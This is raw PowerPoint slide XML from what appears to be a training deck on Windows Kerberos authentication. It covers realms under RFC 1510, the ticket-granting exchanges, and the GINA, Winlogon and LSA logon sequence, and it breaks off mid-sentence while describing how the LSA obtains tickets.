            <a:endParaRPr lang="en-US" sz="1200"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The RFC 1510 describes Kerberos realms and their organization as follows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>"The Kerberos protocol is designed to operate across organizational boundaries. A client in one organization can be authenticated to a server in another. Each organization wishing to run a Kerberos server establishes its own 'realm.'“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200"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"Realms are typically organized hierarchically. Each realm shares a key with its parent and a different key with each child. If an inter-realm key is not directly shared by two realms, the hierarchical organization enables an authentication path to be easily constructed. If a hierarchical organization is not used, it might be necessary to consult some database in order to construct an authentication path between realms.“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200"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"Although realms are typically hierarchical, intermediate realms might be bypassed to achieve cross-realm authentication through alternative authentication paths (these might be established to make communication between two realms more efficient). It is important for the end-service to have information about which realms were transited when deciding how much faith to place in the authentication process. To facilitate this decision, a field in each ticket contains the names of the realms that were involved in authenticating the client.“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200"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It is clear from the RFC's discussion that the concept of Kerberos realms has similarities—such as organizational boundaries and trusts—to attributes of the Windows NT domains. Active Directory domains use inter-realm-key-based trusts and a hierarchical design. These inter-realm (also called inter-domain) keys are the basis of transitive trust in Active Directory domains.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Note </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>In literature documenting Windows operating systems, the term "domains" might be used in place of place of the term "realms." In such cases, the term "realms" will be used to denote non-Windows Kerberos realms in the environment.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200"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In Kerberos authentication, Active Directory domains fulfill all the requirements of Kerberos realms.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CD0E444A-B36E-400A-A8D6-1C82AC119240}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23380386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Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CD0E444A-B36E-400A-A8D6-1C82AC119240}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27113566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7094231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Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The Authentication Service Exchange</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" b="1" i="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>1. Kerberos authentication service request (KRB_AS_REQ)</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" b="1"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The client contacts the Key Distribution Center's authentication service for a short-lived ticket (a message containing the client's identity and—for Windows clients—SIDs) called a ticket-granting ticket (TGT). This happens at logon.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>2. Kerberos authentication service response (KRB_AS_REP)</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" b="1"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The authentication service (AS) constructs the TGT and creates a session key the client can use to encrypt communication with the ticket-granting service (TGS). The TGT has a limited lifetime. At the point that the client has received the TGT, the client has not been granted access to any resources, even to resources on the local computer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" sz="1200"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Why use a TGT? Could the AS simply issue a ticket for the target server? Yes, but if the AS issued tickets directly, the user would have to enter a password for every new server/service connection. Issuing a TGT with a short lifespan (typically 10 hours) gives the user a valid ticket for the ticket-granting service, which in turn issues target-server tickets. The TGT's main benefit is that the user only has to enter a password once, at logon.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The Ticket-Granting Service Exchange</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" b="1" i="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>3. Kerberos ticket-granting service request (KRB_TGS_REQ)</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" b="1"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The client wants access to local and network resources. To gain access, the client sends a request to the TGS for a ticket for the local computer or some network server or service. This ticket is referred to as the service ticket or session ticket. To get the ticket, the client presents the TGT, an authenticator, and the name of the target server (the Server Principal Name or SPN).</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>4. Kerberos ticket-granting service response (KRB_TGS_REP)</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" b="1"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The TGS examines the TGT and the authenticator. If these are acceptable, the TGS creates a service ticket. The client's identity is taken from the TGT and copied to the service ticket. Then the ticket is sent to the client.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Note </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The TGS cannot determine if the user will be able to get access to the target server. It simply returns a valid ticket. Authentication does not imply authorization.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The Client/Server Exchange</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" b="1" i="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>5. Kerberos application server request (KRB_AP_REQ)</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" b="1"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After the client has the service ticket, the client sends the ticket and a new authenticator to the target server, requesting access. The server will decrypt the ticket, validate the authenticator, and for Windows services, create an access token for the user based on the SIDs in the ticket.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>6. Kerberos application server response (optional) (KRB_AP_REP)</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" b="1"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Optionally, the client might request that the target server verify its own identity. This is called mutual authentication. If mutual authentication is requested, the target server will take the client computer's timestamp from the authenticator, encrypt it with the session key the TGS provided for client-target server messages, and send it to the client.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CD0E444A-B36E-400A-A8D6-1C82AC119240}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23380386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sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>After the Graphical Identification and Authentication (GINA) dynamic-link library has collected the user's logon information, it passes that information to the LSA for authentication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The LSA simply passes the information on to the SSPI.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The SSPI does not determine whether the user is logging on locally or through a domain account. Because the Kerberos SSP is the default authentication provider, the authentication request is first passed to the Kerberos SSP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The Kerberos SSP verifies that the logon target name is the same as the local computer name. If so, the Kerberos SSP returns an error message to the SSPI that no logon servers are available, just as if it had checked the network for a KDC and found none.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The SSPI now sends the request to the next security provider, NTLM. The authentication process used by the NTLM SSP is identical to versions used in Windows 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3183971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4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23976872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900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>If the user is a member of a domain, then the account database is on a domain controller. If you are logging on to one of the domain controllers for the domain you belong to, then the process it the same as for local logon as described above. If instead you are logging on to a member server or a domain controller of another domain, then Kerberos authentication will used if possible.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Users never directly access the system. The system impersonates the user and accesses resources based on the resource permissions granted to the user. This is a standard security feature of all versions of Windows NT, Windows 2000, and Windows Server 2003. The user logging on to a workstation never directly accesses even local resources. The local system impersonates the user just as a remote system would.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Because the local system relies on impersonation, the user who logs on to the domain must be authenticated as a valid local user. The only new component added to the domain logon process is Kerberos authentication prior to building an access token.</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authentication process for a domain user to access their computer is very similar to the process used to authenticate access to network resources—that is, the user must obtain a valid ticket for the local workstation.</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Kerberos client requests and then receives a TGT from the KDC.</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Kerberos client uses the TGT to request and then receive a service ticket for the local workstation from the KDC.</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service ticket for a network resource would be encrypted with the system or service key depending on whether the resource is a system or service. The workstation has a system key created when the computer joined the domain. The service ticket for the workstation is encrypted with this key.</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local LSA builds an access token from the credentials contained in the service ticket and then grants or denies the user access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" i="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>How Logging on the Workstation Works</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Suppose the user has a network account in the domain tailspintoys.com. The user's workstation also belongs to tailspintoys.com. The user logs on to the network by pressing CTRL+ALT+DEL, which is the Secure Attention Sequence (SAS) on computers with a standard Windows configuration.</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In response to the SAS, the workstation's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Winlogon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> service switches to the logon desktop and calls the GINA DLL, a component loaded in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Winlogon's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> process. The GINA is responsible for collecting logon data from the user, packaging it in a data structure, and sending everything to the LSA for verification. Other parties can develop replacement GINAs, but in this case </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Winlogon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> has loaded the standard component supplied with the operating system, MSGINA.DLL. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Winlogon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> calls it, and the GINA displays the standard logon information dialog box.</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user types a user name and password. From the domains in a drop-down list, the user selects tailspintoys.com. When the user clicks OK to dismiss the dialog box, MSGINA returns the logon information to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Winlogon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Winlogon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> sends the information to the LSA for validation by calling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>LsaLogonUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>. This procedure is standard for any user logon regardless of the authentication method used.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>At this point, the LSA begins to use the Kerberos V5 authentication protocol.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="900"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Kerberos Keys</a:t>
            </a:r>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A user key is derived from a password. After it receives a data structure with the user's logon data, the LSA converts the plaintext password to a cryptographic key by passing the text of the password through a cryptographic function. (All implementations of the Kerberos version 5 authentication protocol must support DES-CBC-MD5. Other algorithms are permissible.) The result of the cryptographic function is the user key.</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LSA saves the user key in the user credentials cache, where it can be retrieved when needed for TGT renewal or for NTLM authentication to servers that are not capable of Kerberos authentication.</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In order to validate the user's logon information and set up the user's logon session on the computer, the LSA must obtain:</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A TGT good for admission to the ticket-granting service.</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A service ticket good for admission to the computer.</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LSA obtains these tickets by working through the Kerberos SSP, which exchanges messages directly with the KDC in tailspintoys.com. (The workstation has located a KDC through a DNS query. Every domain controller is a KDC and registers its role with DNS.)</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TGT is obtained in an authentication service (AS) exchange; the service ticket is obtained in a ticket-granting 